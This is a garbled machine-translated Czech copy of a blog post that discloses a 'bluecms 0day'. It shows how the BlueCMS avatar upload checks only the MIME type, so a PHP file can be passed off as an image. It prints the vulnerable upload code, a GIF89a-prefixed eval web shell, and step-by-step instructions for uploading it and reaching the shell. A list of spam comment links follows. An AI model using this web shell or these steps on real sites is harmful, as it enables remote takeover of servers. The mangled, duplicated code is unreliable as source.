RSS

bluecms 0 dny

Tento záznam byl zaslán Říjen 07 2009

: St0p
Reprodukovat uveďte zdroj: http://www.st0p.org

Poznámka: Omlouváme se, ale verze ranní vlasů v noci volal duální do novin 0day, informován a prostě jít na oficiální podíval, a vydala opravu zabezpečení brzy ah .. můžete jít on-line není aktualizovaná verze testu ...

Bohužel, skupina A můj kamarád dělal CMS, řekl uživatelská data upravit některé mohou být aplikován, říká analýza, s lokálně instalované po, není možné použít jednoduché uvozovky jsou unikl magic_quotes_gpc = off. . .

Viz include / common.inc.php linku, vzdát. .

 
 2
 3
 4
 5
 6
 7
 8
 9
  ......
  ! get_magic_quotes_gpc ( ) ) if (! get_magic_quotes_gpc ())
  {
 	 deep_addslashes ( $_POST ) ; $ _POST = Deep_addslashes ($ _POST);
 	 deep_addslashes ( $_GET ) ; $ _GET = ($ _GET Deep_addslashes);
 	 deep_addslashes ( $_COOKIES ) ; Kč _COOKIES = Deep_addslashes ($ _COOKIES);
 	 deep_addslashes ( $_REQUEST ) ; Kč _REQUEST = ($ _REQUEST Deep_addslashes);
  }
 ...... 

Možná st0p štěstí, viz nahrát fotografie částí, analýza kódu, použít něco najít v user.php. .

 
 2
 3
 4
 5
 6
  BLUE_ROOT . 'include/upload.class.php' ) ; //调用上传类 require_once (BLUE_ROOT. "include / upload.class.php '); / / volání třídy nahrávání
     new upload ( ) ; $ Image = new upload ();
	  isset ( $_FILES [ 'face_pic' ] [ 'error' ] ) && $_FILES [ 'face_pic' ] [ 'error' ] == 0 ) { if (isset ($ _FILES ['face_pic'] ['error']) && $ _FILES ['face_pic'] ['error'] == 0) {
		 $image -> img_upload ( $_FILES [ 'face_pic' ] , 'face_pic' ) ; $ $ = Face_pic obrázek -> img_upload ($ _FILES ['face_pic'], 'face_pic'); 
                          / / Nezjistila příponu přímo do, bude třída schopni přenést SHELL
	 } 

Otevřete include / upload.class.php pouze k detekci hlavičku souboru nerozpozná příponu

 
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 upload { private $allow_image_type = array ( 'image/jpg' , 'image/gif' , 'image/png' , 'image/pjpeg' ) ; ...... function img_upload ( $file , $dir = '' , $imgname = '' ) { if ( empty ( $dir ) ) { $dir = BLUE_ROOT . DATA . UPLOAD . date ( "Ym" ) . "/" ; } else { $dir = BLUE_ROOT . DATA . UPLOAD . $dir . "/" ; } if ( ! file_exists ( $dir ) ) { if ( ! mkdir ( $dir ) ) { showmsg ( '上传过程中创建目录失败' ) ; } } if ( empty ( $imgname ) ) { $imgname = $this -> create_tempname ( ) . $this -> get_type ( $file [ 'name' ] ) ; } $imgname = $dir . $imgname ; if ( ! in_array ( $file [ 'type' ] , $this -> allow_image_type ) ) { //只是检测了文件头部来着,那我们就直接构造一个SHELL就好了 showmsg ( '不允许的图片类型' ) ; } } Třídy ...... nahrávání {private $ allow_image_type = array ("image / jpg ',' image / gif ',' image / png ',' image / pjpeg '); ...... funkce img_upload ($ file, $ dir ='', $ imgname ='') {if (empty ($ dir)) {$ dir = BLUE_ROOT Nahrávání dat date ("Ym") "/"; týden..} else {$ dir = BLUE_ROOT Nahrávání dat $ dir "/.".} if (file_exists ($ dir)) {if (mkdir ($ dir)!) {showmsg (dále jen "proces nahrávání Nepodařilo se vytvořit adresář ');}} if (empty ($ imgname)) {$ imgname = $ this -> create_tempname () $ this -> get_type ($ file ['name']);.} $ imgname = $ dir $ imgname if (in_array ($.! soubor ["typ"], $ this -> allow_image_type)) {/ / jen pro detekci hlavičku souboru s, jsme přímo postavit SHELL jako showmsg z obrázku ('není povoleno ");}} 

Výše uvedené výjimkou st0p.php

 
 2
  GIF89a
 ( $_POST [ st0p ] ) ; ?> <PHP eval ($ _POST [st0p]);?> 

Poznámka sítě účet přihlášení, člen -> můj profil, pak nahrát nový obrázek do voleb jsme vybudovali PHP souboru, přejděte na potvrzení upravit, zobrazit adresa je úspěšný, klepněte pravým tlačítkem myši na fotografii přímo na trati. . Slovo SHELL úspěšně nahrán!

bluecms-0day1

bluecms-0day2

Analýza je dokončena, doufám, že další výměna, problém tyto věci jen chcete splnit několik přátel společně diskutovat o technologii, nastavit skupinu stejně, jen obyčejná skupina, jen 100 lidí, vyčistit, nikdy se mluví byl těžce naložené B chaos T, deprese, je otevřená skupina pro výměnu a nemluví se symbol v místě, chtějí k pokroku, může jít stranou silnice!
Pokud si do skupiny jen proto, aby výsledky jednání jiných, z jiných, nevím zaplatit, nebo se jen přijít potápění, nebo bez něj. . .

Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag


61 Reakce na "bluecms 0day"

  1. Ja, verjetno zato JE


  1. 60 Odezva (y)

  2. začátečníci Průvodce tužka, kreslení
  3. Taxi Boston
  4. Zahrádkáři palců Crouch End na N8
  5. Krajina Zahrádkáři Londýn
  6. EBook
  7. definitivní technologie supercubeï ¿ ½ 6000
  8. nutrición Deportiva
  9. Whatman Extrakční patrony
  10. 1 TIU
  11. portarollo
  12. antykwariaty
  13. ď »ż Alpha Záruční služby,
  14. Alpha Záruční služby
  15. NBA předpovědi
  16. Manistee svatební fotograf
  17. wof Christchurch
  18. free porno videa na
  19. kulturistika tričko
  20. NFL kurzy
  21. Kde sázet Super Bowl 46
  22. poškození páteře
  23. Inzerce zdarma
  24. St George chiropraktik
  25. jasnovidce Velká Británie
  26. sázková kancelář sázení
  27. flebotomie technik
  28. mazda náhradní díly
  29. auto zámečník v Port Richmond, NY
  30. agustus
  31. trycholog Gdyně
  32. kupony výměny oleje
  33. horní asijských sázková kancelář
  34. Donald málo Bobby uhnout abonnement
  35. Auckland drainlayer
  36. psychické světlo
  37. Elektrik
  38. fyzikální terapie asistent
  39. táborníci svět
  40. duchovní
  41. Abdel-Malik
  42. domy cz
  43. golfového švihu pomoc
  44. truhlářství Auckland
  45. duševní četby
  46. slepice noc
  47. Aboubakar
  48. Online hry
  49. Alisson
  50. NBA výběr
  51. bez psychické chatu
  52. bezpečnostní dveře cz
  53. turistické obchody
  54. sanatoria palců Auckland
  55. Inspektoři Auckland
  56. on-line ryby obchod
  57. Ares, ke stažení zdarma
  58. Szkola jazdy Gdyně opinie
  59. antykwariaty
  60. Žaluzie
  61. Zdarma Beats By Dre

Musíte být přihlášen , abyste mohl psát komentář.